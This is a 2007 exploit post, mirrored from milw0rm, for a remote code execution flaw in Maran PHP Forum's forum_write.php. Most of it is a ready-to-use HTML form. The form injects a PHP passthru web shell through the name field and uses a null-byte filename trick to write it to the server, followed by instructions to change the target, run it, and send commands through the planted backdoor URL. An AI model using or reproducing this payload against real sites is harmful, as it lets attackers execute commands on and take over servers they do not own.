Security Advisory: Maran PHP Forum (forum_write.php) Remote Code Execution Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  PHP-Ring Webring System 0.9 Remote SQL Injection Vulnerability
  JChit counter 1.0.0 (imgsrv.php ac) Remote File Disclosure Vulnerability
  GPB bulletin board Remote file include
  AWBS v2.4.0 Remote file include[cart2.php]

From: Dj7xpl <dj7xpl_(at)_yahoo.com>
Date: 30.04.2007
Subject: Maran PHP Forum (forum_write.php) Remote Code Execution Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
                                +
+                                               Y! Underground Group                                               +
+
                                +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
                                +
+          Portal......: Maran PHP Forum                                                                          +
+          Author......: Dj7xpl / Dj7xpl@Yahoo.com                                                                +
+          Type........: Remote Code Execution                                                                    +
+          Download....: http://www.maran.pamil-visions.com/maranforum.php                                        +
+          Page........: http://Dj7xpl.2600.ir                                                                    +
+
                                +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
                                +
+          Xpl.........:
         +
+ <html><head><Title>---===Maran PHP Forum===------===Dj7xpl===---</title></head>                                 +
+ <body bgcolor="red">
          +
+ <center>
                      +
+ <form name="AimStats" method="post" action="http://site.com/path to site/forum_write.php">                      +
+ <input name="name" value="<?passthru($_GET[cmd])?>" type="text" >                                               +
+ <input name="page" value="pagename.php%00" type="text" >                                                        +
+ <input type="submit" name="Submit" value="Submit" >                                                             +
+ </form><br><br>
               +
+ <font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font><br>                            +
+ <font color="#C0FF3E" size="+1"> Backdoor : http://[Target]/[Path]/data/pagename.php?cmd=shell</font></br>      +
+ <font color="#C0FF3E" size="+1"> E.g : http://site.com/forum/data/filename.php?cmd=ls -la</font>              +
+ </center>
                     +
+ </body>
                       +
+ </html>
                       +
+
                                +
+
                                +
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2007-04-22]